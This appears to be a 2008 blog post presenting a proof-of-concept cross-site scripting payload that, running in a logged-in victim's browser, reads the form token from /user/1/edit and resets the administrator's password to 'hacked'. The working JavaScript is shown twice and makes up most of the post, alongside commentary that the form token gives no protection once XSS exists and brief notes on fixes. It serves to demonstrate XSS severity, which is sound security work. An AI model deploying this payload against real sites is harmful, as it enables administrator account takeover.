Update UID 1 password via JS
Heine Mon, 2008/01/14 - 09:08
A simple proof of concept (without <script> tags) that resets the administrator's (user 1) password via a cross-site scripting (XSS) attack. Because the injected script runs in the victim's browser on the site's own origin, it can fetch the user-edit form, read the form token out of the response and submit the change with the victim's session — so the form token offers no protection once an XSS hole exists. Did you think XSS was harmless?
// Proof of concept: runs inside the victim's page (XSS), uses the page's own
// jQuery to GET /user/1/edit, scrapes the form token out of the HTML and POSTs
// a password change for user 1 back to the same URL. Both requests are
// same-origin, so the browser attaches the victim's session cookies; the form
// token is not a defence here because the attacker can simply read it.
// NOTE(review): the only real fix is removing the XSS (output escaping/CSP);
// requiring the current password on password changes would also blunt this.
// Test for the presence of jquery.
if (typeof jQuery == 'function') {
// Fetch a correct token from user/1/edit because we will need it to
// successfully submit the user edit form later.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
jQuery.get('/user/1/edit',
function (data, status) {
// jQuery's textStatus string; anything but 'success' is silently ignored.
if (status == 'success') {
// Extract the token.
// String.prototype.match returns null when the markup is absent (e.g. an
// "access denied" page for a non-admin victim, or a changed template), so
// matches[1] below throws a TypeError in that case - the PoC does not guard it.
var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
var token = matches[1];
// Post the minimum amount of fields. Other fields get their default values.
// Only form_id/form_token plus the two password fields are sent; the site is
// relied on to fill in every other field with its default.
var payload = {
"form_id": 'user_edit',
"form_token": token,
"pass[pass1]": 'hacked',
"pass[pass2]": 'hacked'
};
// Fire-and-forget: no callback, so success or failure of the change is
// never observed by the script.
jQuery.post('/user/1/edit', payload);
}
}
);
}
// Same PoC, restructured. Preconditions: the script is executing on the
// target site (XSS) and the page has already loaded jQuery - nothing is
// loaded by the script itself. It reads the form token from the user-1 edit
// page and posts a password change for that account to the same URL.
if (typeof jQuery == 'function') {
  var editUrl = '/user/1/edit';
  // Captures the value of the hidden form-token field from the edit page HTML.
  var tokenPattern = /id="edit-user-edit-form-token" value="([a-z0-9]*)"/;

  // Callback for the GET of the edit form: extract the token and submit the
  // minimal set of fields; the server fills in every other field with its
  // default value.
  var onEditPage = function (html, result) {
    if (result != 'success') {
      return;
    }
    // match() yields null when the token markup is not present (e.g. an
    // access-denied page); found[1] then throws, exactly as in the original.
    var found = html.match(tokenPattern);
    var formToken = found[1];

    var fields = {};
    fields["form_id"] = 'user_edit';
    fields["form_token"] = formToken;
    fields["pass[pass1]"] = 'hacked';
    fields["pass[pass2]"] = 'hacked';

    // No completion handler: the outcome of the POST is not observed.
    jQuery.post(editUrl, fields);
  };

  jQuery.get(editUrl, onEditPage);
}